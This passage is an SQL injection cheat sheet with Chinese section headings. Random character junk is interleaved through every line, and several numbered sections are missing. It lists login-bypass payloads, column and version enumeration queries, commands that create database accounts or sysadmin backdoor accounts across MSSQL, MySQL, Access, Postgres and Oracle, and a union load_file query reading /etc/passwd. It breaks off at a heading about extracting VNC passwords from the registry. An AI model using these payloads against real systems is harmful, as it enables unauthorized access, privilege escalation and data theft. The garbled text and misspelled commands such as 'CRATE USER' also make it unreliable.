7 t8 }% U1 S4 n5 i: v3 ~# j- Login:’ or 1=1– ' A/ w- y* a' v/ x* s 3 D8 x( o4 b& ^! g9 b U$ h: g- Pass:’ or 1=1–6 i; z6 m% W3 W" S2 b$ J
9 w1 H* @" k/ F+ F- http://website/index.asp?id=’ or 1=1– 9 |) K& Z* ]) Q8 _: e, h v- f+ ~ N% v2 q2 [1 I9 b0 E
还有下面这样的方式:5 l: J' t. ], A/ Z m1 N* F
" O: c! K8 u4 H- ‘ having 1=1–' b( t1 i4 }# e5 l) i5 h
1 {' M% h9 g" Y' J: k) d- ‘ group by userid having 1=1–8 K' o5 J+ B% {
7 t$ T. U) J- ~8 e8 U
- ‘ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘tablename’)– - A1 ? ^/ m. Y' b9 k: k1 z6 v+ U5 ]) x
- ‘ union select sum(columnname) from tablename–5 B4 I9 h; p T) A8 B/ E
/ k x' A# J4 [6 k1 N a/ |/ X0 C W* m" T& H4 n' ?) ~6 d# V) h* O0 B% e* m
3、收集信息3 i8 R8 `, \$ b2 u0 j
1 ?' f" \1 N+ ~. }8 A& v8 D0 G
- ‘ or 1 in (select @@version)–! e% b$ L( E& L2 [! }: Y k
3 s, Q+ _' O8 q' ~" [- ‘ union all select @@version–3 W3 ^% B. ~! W# U7 ~' g! B
, U! N1 B) M( I. p: F5 T* o1 u- ]5 Y3 ~0 z
4、数据类型 W$ T( a/ I5 s( P. Z5 j8 t 3 e E O) w6 S( TOracle数据库>>- |" V2 V3 f$ q0 t. e
( b! x: q* r. r
–>SYS.USER_OBJECTS (USEROBJECTS) 6 y( ]+ _9 r6 p1 C% u2 u9 F4 d- K3 t' C5 _6 A& T! p
–>SYS.USER_VIEWS" j1 C+ i5 n, [5 r
) S% U& O3 |- `exec sp_addlogin ‘name’ , ‘password’- v* [$ y( a( _/ u. z" M' T
6 k" S5 `' N, e. U, ~& {exec sp_addsrvrolemember ‘name’ , ’sysadmin’ 9 [* d7 ~3 e1 i # a3 `) C" }1 k: r4 D: \, t9 Z8 Q; u* d3 z1 G) ?
v6 J$ [' l4 Y6 P0 _& r& \
MySQL" k. P) z. g; ^' E% g9 B
2 j: v9 M+ P! I* m% }; XINSERT INTO mysql.user (user, host, password) VALUES (’name’, ‘localhost’, PASSWORD(’pass123′)) 4 v, O0 R* P1 s u8 J/ E5 H/ F ; D( o" i' `) D# c s" i 7 ` Z0 `) H; P9 t _+ h* c# Z9 m# H: D& N ^9 { I# f
Access . Q8 x0 K9 N5 F# \5 t1 O9 q' y; z- i$ b9 M
CRATE USER name IDENTIFIED BY ‘pass123′3 v. Z% k) i6 b3 n4 s
m+ T4 b, {9 [8 L! S9 W 3 Y% I. F' a& e7 e5 H ! b! v. U3 O9 d& q8 Y* e0 l. WPostgres (requires Unix account)1 h; W: e: w5 g7 x& o# `) j h
1 ` ? u% C7 |7 WCRATE USER name WITH PASSWORD ‘pass123′ . X' C$ y6 A2 M3 Z- b* `( f " |4 d9 _6 d0 k( `- ]+ ]2 I4 r1 V! d- ?
$ l$ \: V; F0 e) F! n( a* V9 i' g5 n
Oracle ( K2 g2 p D9 q4 }. W1 u$ E3 s0 S/ s1 f7 H
CRATE USER name IDENTIFIED BY pass123 % L p0 U' j4 [6 n 4 x h' R9 a- P; L+ Q TEMPORARY TABLESPACE temp 8 W2 k; M* O: c( o: L$ h# d % b4 f1 F9 v) q$ n7 { DEFAULT TABLESPACE users; , q `; J# h+ q9 d3 p7 i3 c3 y4 r3 X4 [6 X' ]) C6 V h
GRANT CONNECT TO name;6 h" g! `' _5 x7 s1 u
2 q# u3 F; h/ s5 j' z- p
GRANT RESOURCE TO name; : l4 }' V* `2 X4 t: s5 l * K6 M0 s& v6 D2 I* } ( j1 o; G: c. T! a% G- M0 h6 F, T& V
7、MYSQL交互查询 5 a* A. a% [4 m/ Q3 \$ e" X7 \
使用Union查询,暴出文件代码,如下: " g/ I4 O, H! L2 i* H K6 i6 d; l) k- j# O% U* y
- ‘ union select 1,load_file(’/etc/passwd’),1,1,1; : w4 g. G6 o' R% e6 P# i8 ~8 k7 Y7 E9 ]1 F/ Y6 v
( F1 t6 F% x+ V$ w 9 a& Y! }; l0 w' @- u8、系统服务名和配置 N- v$ Y8 E. ~( d% n1 w+ r: | , q0 O, N* B7 l, _% \. r, Y0 t- ‘ and 1 in (select @@servername)–2 c# L8 J, r) [; _1 E% _5 p* C
G b3 @& I' f7 S- ‘ and 1 in (select servername from master.sysservers)–9 \- N" {' V9 x3 R* L$ \+ v
. x4 r# X4 t8 V0 R, p4 {- ^: l. b
- D0 `, v- s8 O o7 O7 z T
5 |4 W$ `2 Z( o& G( G" m% R/ z
9、找到VNC密码(注册表)) Y& V6 V. a; U* q& m